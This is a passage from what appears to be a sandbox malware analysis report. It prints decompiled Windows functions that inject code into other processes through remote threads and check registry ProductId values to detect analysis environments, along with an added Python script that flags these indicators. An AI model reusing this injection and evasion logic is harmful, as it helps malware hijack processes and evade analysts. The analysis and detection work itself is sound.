                                    • Opcode Fuzzy Hash: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction Fuzzy Hash: 44618230964A006EEA107BA64A06B5F1749CF52349F84007BF9447F2D3DBFDCD415AAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00403A58(void* __eax, void* __ecx, void* __edx, void* __eflags) {
                                    				intOrPtr _v20;
                                    				long _v24;
                                    				_Unknown_base(*)()* _v28;
                                    				_Unknown_base(*)()* _v32;
                                    				char _v36;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				intOrPtr _t15;
                                    				long _t17;
                                    				void* _t19;
                                    				void* _t23;
                                    				void* _t24;
                                    				void* _t31;
                                    				long _t32;
                                    				void* _t33;
                                    				DWORD* _t34;
                                    
                                    				_t25 = __ecx;
                                    				_t34 =  &_v24;
                                    				_t33 = __ecx;
                                    				_t31 = __edx;
                                    				_t23 = __eax;
                                    				_t32 = 0;
                                    				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
                                    				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
                                    				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
                                    				_t15 = E004037EC(_t23, _t23, _t25, _t33, _t31, 0); // executed
                                    				_v20 = _t15;
                                    				_t17 = E004037EC(_t23, _t23, _t25, _t31, _t31, 0); // executed
                                    				_v24 = _t17;
                                    				_t19 = E004038AC(_t23,  &_v36, E00403A28, 0, 0x14); // executed
                                    				_t24 = _t19;
                                    				if(_t24 != 0) {
                                    					WaitForSingleObject(_t24, 0xffffffff);
                                    					GetExitCodeThread(_t24, _t34);
                                    					_t32 =  *_t34;
                                    				}
                                    				return _t32;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 00403A71
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A77
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403A8A
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A90
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AA3
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403AA9
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AE9
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction ID: 752bd04c13f1fb2c2637546d5d52efbb0f8f36bbb6a531361d47cc1ab833d988
                                    • Opcode Fuzzy Hash: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction Fuzzy Hash: 350157A0B443053AC610BE7A4C42A1BBE9C9BC472BB10893F7554B72D2DA7DDF0486AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%
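The two API listings above carry the behaviours that matter for triage: the evasion function at 0040B1xx exits the process after a chain of checks (one ExitProcess call site per check, GetTickCount for timing, and a GetModuleHandleA("SbieDll.dll") probe for Sandboxie's in-process DLL), and E00403A58 injects through the VirtualAllocEx, WriteProcessMemory and CreateRemoteThread helpers E004037EC/E004038AC. The argument columns in these listings are a snapshot of the stack at the call site, not decoded parameters (the "kernel32" in GetProcAddress.KERNEL32(00000000,kernel32) is the argument left over from the preceding GetModuleHandleA call), so only the first argument of GetModuleHandleA is relied on below. The following is an added example, not part of the Joe Sandbox report or of the sample: it parses bullet lines in the report's own format and tags a function with these indicators. The sample listings are copied from this page (some argument lists shortened); the ExitProcess threshold is an assumption of the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Added example (not the report's tooling): parse "APIs" bullet lines of a
# Joe Sandbox function listing and tag the behaviours this page shows.
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"          # GetTickCount lines have no argument list
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                       # call-site stack snapshot, not decoded parameters
    ref: str                         # address of the call instruction
    subcall: Optional[str] = None    # callee the call was attributed from, if any


def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod").upper(), args,
                             m.group("ref").upper(), m.group("sub")))
    return calls


INJECTION_CHAIN = {"VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"}
SANDBOX_DLLS = {"sbiedll.dll"}   # Sandboxie's in-process DLL, the one this sample probes
EXIT_CHAIN_MIN = 4               # assumed heuristic: this many ExitProcess call sites in one function


def classify(calls: list) -> dict:
    """Tag one function's call list with the indicators visible in this report."""
    apis = {c.api for c in calls}
    findings = {}
    probed = sorted({c.args[0] for c in calls
                     if c.api == "GetModuleHandleA" and c.args
                     and c.args[0].lower() in SANDBOX_DLLS})
    if probed:
        findings["sandbox_probe"] = probed
    if INJECTION_CHAIN <= apis:          # alloc + write + remote thread in one function
        findings["remote_thread_injection"] = sorted(INJECTION_CHAIN)
    exit_sites = {c.ref for c in calls if c.api == "ExitProcess"}
    if len(exit_sites) >= EXIT_CHAIN_MIN:
        findings["exit_on_check_chain"] = len(exit_sites)
    return findings


# Listing lines copied from this page (argument lists shortened where marked).
EVASION_LISTING = """\
• ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B12E
• ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B148
• ExitProcess.KERNEL32(00000000,00000000,0040BF40), ref: 0040B162
• ExitProcess.KERNEL32(00000000,00000000,0040BF40), ref: 0040B17C
• GetTickCount.KERNEL32 ref: 0040B245
  • Part of subcall function 004052EC: GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,0040B128,00000000,0040BF40), ref: 004052F4
"""

INJECTION_LISTING = """\
• GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 00403A71
• GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A77
  • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 00403828
  • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
  • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
  • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
  • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread), ref: 00403AE9
• GetExitCodeThread.KERNEL32(00000000,?), ref: 00403AF0
"""

if __name__ == "__main__":
    for name, listing in (("0040B1xx", EVASION_LISTING), ("E00403A58", INJECTION_LISTING)):
        print(name, classify(parse_api_lines(listing)))
```

The injection tag keys on the whole triad inside one function, including calls the report attributes through "Part of subcall function", because the sample keeps the alloc/write and the thread creation in separate helpers; a rule that only inspects direct calls would miss it.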

                                    C-Code - Quality: 100%
                                    			E004012B8(CHAR* __eax, intOrPtr* __edx) {
                                    				char _t5;
                                    				char _t6;
                                    				CHAR* _t7;
                                    				CHAR* _t8;
                                    				char _t9;
                                    				CHAR* _t11;
                                    				char _t14;
                                    				CHAR* _t15;
                                    				char _t17;
                                    				CHAR* _t19;
                                    				CHAR* _t22;
                                    				CHAR* _t23;
                                    				CHAR* _t32;
                                    				intOrPtr _t33;
                                    				intOrPtr* _t34;
                                    				void* _t35;
                                    				void* _t36;
                                    
                                    				_t34 = __edx;
                                    				_t22 = __eax;
                                    				while(1) {
                                    					L2:
                                    					_t5 =  *_t22;
                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                    						_t22 = CharNextA(_t22);
                                    					}
                                    					L2:
                                    					_t5 =  *_t22;
                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                    						_t22 = CharNextA(_t22);
                                    					}
                                    					L4:
                                    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                    						_t36 = 0;
                                    						_t32 = _t22;
                                    						while(1) {
                                    							_t6 =  *_t22;
                                    							if(_t6 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t6 != 0x22) {
                                    								_t7 = CharNextA(_t22);
                                    								_t36 = _t36 + _t7 - _t22;
                                    								_t22 = _t7;
                                    								continue;
                                    							}
                                    							_t8 = CharNextA(_t22); // executed
                                    							_t22 = _t8;
                                    							while(1) {
                                    								_t9 =  *_t22;
                                    								if(_t9 == 0 || _t9 == 0x22) {
                                    									break;
                                    								}
                                    								_t11 = CharNextA(_t22);
                                    								_t36 = _t36 + _t11 - _t22;
                                    								_t22 = _t11;
                                    							}
                                    							if( *_t22 != 0) {
                                    								_t22 = CharNextA(_t22);
                                    							}
                                    						}
                                    						E00402074(_t34, _t36);
                                    						_t23 = _t32;
                                    						_t33 =  *_t34;
                                    						_t35 = 0;
                                    						while(1) {
                                    							_t14 =  *_t23;
                                    							if(_t14 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t14 != 0x22) {
                                    								_t15 = CharNextA(_t23);
                                    								if(_t15 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L27;
                                    								}
                                    								do {
                                    									L27:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t15 > _t23);
                                    								continue;
                                    							}
                                    							_t23 = CharNextA(_t23);
                                    							while(1) {
                                    								_t17 =  *_t23;
                                    								if(_t17 == 0 || _t17 == 0x22) {
                                    									break;
                                    								}
                                    								_t19 = CharNextA(_t23);
                                    								if(_t19 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L21;
                                    								}
                                    								do {
                                    									L21:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t19 > _t23);
                                    							}
                                    							if( *_t23 != 0) {
                                    								_t23 = CharNextA(_t23);
                                    							}
                                    						}
                                    						return _t23;
                                    					} else {
                                    						_t22 =  &(_t22[2]);
                                    						continue;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012EF
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012F9
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401316
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401320
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401349
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401353
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401377
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID: "$"
                                    • API String ID: 3213498283-3758156766
                                    • Opcode ID: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction ID: 10f63cc1fa669f131e3f68441fcaf6b27babd9536db3b85d99238111a4137022
                                    • Opcode Fuzzy Hash: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction Fuzzy Hash: AE21C8446043C059EF316ABA08C07A667C54A1B308B5844BBDAC1FBBF7D47D4887C22E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00403954(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _t20;
                                    				void* _t22;
                                    				void* _t30;
                                    				intOrPtr _t37;
                                    				void* _t40;
                                    				void* _t43;
                                    
                                    				_t30 = __ecx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v8 = __edx;
                                    				_t40 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t43);
                                    				_push(0x4039f2);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t43 + 0xfffffff0;
                                    				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
                                    				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
                                    				_t20 = E004037EC(_t40, 0, _t30, E00401F48(_v8), __edi, _t40); // executed
                                    				_v16 = _t20;
                                    				_t22 = E004038AC(_t40,  &_v20, E00403920, 0, 0xc); // executed
                                    				if(_t22 != 0) {
                                    					CloseHandle(_t22);
                                    				}
                                    				_pop(_t37);
                                    				 *[fs:eax] = _t37;
                                    				_push(E004039F9);
                                    				return E00401AC0( &_v8);
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,004039F2), ref: 00403983
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403989
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 0040399B
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 004039A1
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 004039D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction ID: 3dd456deda738439a9530638aaf5270c0b396e353cabac5e26cfdff56c824f73
                                    • Opcode Fuzzy Hash: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction Fuzzy Hash: 01012DB0B40605BED701EFA68C03A5E7EAC9B44716B60497BB400F72D1DB7C9F009A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004053EC() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				long _t6;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
                                    				if(_t6 == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
                                    					if( &_v264 == "76487-644-3177037-23510") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272);
                                    				return _t15;
                                    			}

                                    0x004053f3
                                    0x00405404
                                    0x0040540b
                                    0x0040540d
                                    0x0040542d
                                    0x0040543b
                                    0x0040543d
                                    0x0040543d
                                    0x0040543b
                                    0x00405443
                                    0x00405451

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405404
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000), ref: 0040542D
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405443
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004053FA
                                    • 76487-644-3177037-23510, xrefs: 00405436
                                    • ProductId, xrefs: 00405423
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-644-3177037-23510$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-300012159
                                    • Opcode ID: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction ID: 4dbc9aba648d7bbbf83a3552de5bfbcba9719c904d90c9cb7132e047c1fadaca
                                    • Opcode Fuzzy Hash: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction Fuzzy Hash: 30F08C706403007AE610EA90CC82FDB778CDB40715F50483AFA84FA1D1D6BDE9889A6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004054A4() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				long _t6;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
                                    				if(_t6 == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
                                    					if( &_v264 == "76487-337-8429955-22614") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272); // executed
                                    				return _t15;
                                    			}

                                    0x004054ab
                                    0x004054bc
                                    0x004054c3
                                    0x004054c5
                                    0x004054e5
                                    0x004054f3
                                    0x004054f5
                                    0x004054f5
                                    0x004054f3
                                    0x004054fb
                                    0x00405509

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054BC
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000), ref: 004054E5
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054FB
                                    Strings
                                    • ProductId, xrefs: 004054DB
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004054B2
                                    • 76487-337-8429955-22614, xrefs: 004054EE
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-337-8429955-22614$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-3593519172
                                    • Opcode ID: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction ID: 47032f9d578e649e4c59a246db62157aaca0609ee869790ecbc754fa5fe81585
                                    • Opcode Fuzzy Hash: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction Fuzzy Hash: A6F0A7703403007AD610DA94CC82F9B778CDB41714F50443AF944FA1C0D3BDE9489F2A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E00406B54(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v124;
                                    				char _v128;
                                    				intOrPtr* _t106;
                                    				intOrPtr* _t107;
                                    				intOrPtr* _t108;
                                    				intOrPtr* _t109;
                                    				intOrPtr* _t110;
                                    				void* _t112;
                                    				void* _t126;
                                    				intOrPtr* _t143;
                                    				void* _t154;
                                    				void* _t166;
                                    				CHAR* _t169;
                                    				int _t172;
                                    				int _t186;
                                    				intOrPtr* _t190;
                                    				intOrPtr* _t191;
                                    				intOrPtr* _t192;
                                    				intOrPtr* _t193;
                                    				intOrPtr* _t198;
                                    				void* _t200;
                                    				void* _t201;
                                    				intOrPtr* _t204;
                                    				intOrPtr* _t218;
                                    				intOrPtr* _t226;
                                    				intOrPtr* _t240;
                                    				intOrPtr* _t248;
                                    				intOrPtr* _t258;
                                    				intOrPtr* _t272;
                                    				intOrPtr* _t284;
                                    				intOrPtr _t301;
                                    				intOrPtr* _t313;
                                    				void* _t314;
                                    				intOrPtr* _t315;
                                    				intOrPtr* _t317;
                                    				void* _t321;
                                    				intOrPtr* _t332;
                                    				intOrPtr _t333;
                                    				intOrPtr* _t334;
                                    				intOrPtr* _t338;
                                    				char _t340;
                                    				intOrPtr _t351;
                                    				CHAR* _t392;
                                    				CHAR* _t394;
                                    				intOrPtr _t396;
                                    				intOrPtr _t397;
                                    				void* _t402;
                                    
                                    				_t393 = __esi;
                                    				_t391 = __edi;
                                    				_t396 = _t397;
                                    				_t314 = 0xf;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t314 = _t314 - 1;
                                    				} while (_t314 != 0);
                                    				_push(_t314);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_t313 = __edx;
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t396);
                                    				_push(0x407061);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t397;
                                    				E00401B14(_t313, _v8);
                                    				_t106 =  *0x40d1f0; // 0x40e890
                                    				_t399 =  *_t106;
                                    				if( *_t106 != 0) {
                                    					_t107 =  *0x40d1f0; // 0x40e890
                                    					__eflags =  *_t107 - 1;
                                    					if(__eflags != 0) {
                                    						_t108 =  *0x40d1f0; // 0x40e890
                                    						__eflags =  *_t108 - 2;
                                    						if(__eflags != 0) {
                                    							_t109 =  *0x40d1f0; // 0x40e890
                                    							__eflags =  *_t109 - 3;
                                    							if(__eflags != 0) {
                                    								_t110 =  *0x40d218; // 0x40e894
                                    								_t112 = E00401D50( *_t110);
                                    								_t332 =  *0x40d218; // 0x40e894
                                    								_t333 =  *_t332;
                                    								__eflags =  *((char*)(_t333 + _t112 - 1)) - 0x5c;
                                    								if( *((char*)(_t333 + _t112 - 1)) != 0x5c) {
                                    									_t301 =  *0x40d218; // 0x40e894
                                    									E00401D58(_t301, 0x407078);
                                    								}
                                    								_t334 =  *0x40d218; // 0x40e894
                                    								E00401B58( &_v12,  *_t334);
                                    								E00401CAC( &_v28, E00401F48(_v12));
                                    								E00406684(_v28, _t313, __eflags);
                                    							} else {
                                    								E004061DC( &_v12, _t313, __esi, __eflags);
                                    							}
                                    						} else {
                                    							E00406034( &_v12, _t313, __eflags);
                                    						}
                                    					} else {
                                    						E00405F7C( &_v12, _t313, __eflags);
                                    					}
                                    				} else {
                                    					E00405EF0( &_v12, _t313, _t399);
                                    				}
                                    				if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
                                    					E00401D58( &_v12, 0x407078);
                                    				}
                                    				_t338 =  *0x40d208; // 0x40e898
                                    				E00401D58( &_v12,  *_t338);
                                    				_t126 = E00401D50(_v12);
                                    				_t340 = _v12;
                                    				_t401 =  *((char*)(_t340 + _t126 - 1)) - 0x5c;
                                    				if( *((char*)(_t340 + _t126 - 1)) != 0x5c) {
                                    					E00401D58( &_v12, 0x407078);
                                    				}
                                    				_t315 =  *0x40d20c; // 0x40e89c
                                    				E00401D9C( &_v16,  *_t315, _v12);
                                    				E00401CAC( &_v32, E00401F48(_v12));
                                    				E00406684(_v32, _t313, _t401); // executed
                                    				E00401CAC( &_v36, E00401F48(_v16));
                                    				E00405A28(_v36, _t313, _t391, _t393, _t401); // executed
                                    				E00405BEC( &_v40, _t313, _t393, _t401); // executed
                                    				_push(_v40);
                                    				_push(0x407078);
